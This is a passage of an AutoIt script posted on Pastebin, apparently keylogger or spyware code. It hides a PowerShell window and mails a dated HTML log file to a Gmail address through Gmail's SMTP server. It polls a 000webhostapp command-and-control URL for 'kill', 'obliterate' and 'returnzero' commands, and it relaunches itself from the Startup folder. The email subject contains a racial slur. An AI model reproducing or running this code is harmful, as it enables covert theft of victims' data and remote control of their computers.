  892.  
  893. ;Send("/log/logfiles")
  894. ;Send($date)
  895. ;Send(".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  896.  
  897. ;Send("{ENTER}")
  898. ;Sleep(2000)
  899. ;Send("pass");
  900.  
  901. ;Send("{ENTER}")
  902. ;FileOpen($log)
  903. ;Sleep(30000)
  904.  
  905. ; EndIf
  906.  
  907. ;=======================================================================================
  908.  
  909. WEnd
  910. Func Mail()
  911. while(true)
  912. Global $mouseposition = MouseGetPos()
  913. Sleep(300)
  914. Global $mousepositios = MouseGetPos()
  915. if $mouseposition == $mousepositios Then
  916. Run("powershell.exe")
  917. WinWait("Windows PowerShell")
  918. WinSetState("Windows PowerShell", "", @SW_HIDE)
  919.  
  920.  
  921. ControlSend("Windows PowerShell","", "","Send-MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o ");
  922. ;Send($filecontent);
  923. FileClose($file)
  924. ControlSend("Windows PowerShell","", "","-SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never")
  925. ControlSend("Windows PowerShell","", ""," -Attachments ")
  926. ControlSend("Windows PowerShell","", "",@scriptdir)
  927.  
  928. ControlSend("Windows PowerShell","", "","/log/logfiles")
  929. ControlSend("Windows PowerShell","", "",$date)
  930. ControlSend("Windows PowerShell","", "",".htm"); -MailMessage -To isavigualco@gmail.com -From isavigualco@gmail.com -Subject nigas -Body o -SmtpServer smtp.gmail.com -Credential isavigualco@gmail.com -UseSsl -Port 587 -DeliveryNotificationOption never -Attachments C
  931.  
  932. ControlSend("Windows PowerShell","", "","{ENTER}")
  933.  
  934. WinWait("Solicitação de credenciais do Windows PowerShell")
  935. WinSetState("Solicitação de credenciais do Windows PowerShell", "", @SW_HIDE)
  936. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","pass")
  937.  
  938. ControlSend("Solicitação de credenciais do Windows PowerShell","", "","{ENTER}")
  939.  
  940. ;Send("{ENTER}")
  941. ;FileOpen($log)
  942. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "kill" Then
  943. ProcessClose("cmd.exe")
  944. ProcessClose("powershell.exe")
  945. ProcessClose($exename)
  946. Exit 0
  947.  
  948.  
  949. EndIf
  950. ;
  951. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "obliterate" Then
  952.  
  953. ProcessClose("cmd.exe")
  954. ProcessClose("powershell.exe")
  955. FileDelete(@StartupDir & "/" & $exename)
  956. ProcessClose($exename)
  957. EndIf
  958. Sleep(10000)
  959. ProcessClose("cmd.exe")
  960. ProcessClose("Powershell.exe")
  961. If BinaryToString(InetRead("http://isavigualco.000webhostapp.com/index.php?=" & $num)) == "returnzero" Then
  962. $stage = 0;
  963.  
  964. EndIf
  965. Sleep(30000)
  966.  
  967. EndIf
  968. FileDelete(@scriptdir & "/log/logfiles" & $date & ".htm")
  969. Run( @startupdir & "/" & $exename)
  970. Exit 0
  971. WEnd
  972. EndFunc
  973.  
  974. ;WEnd
  975. ;WEnd
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!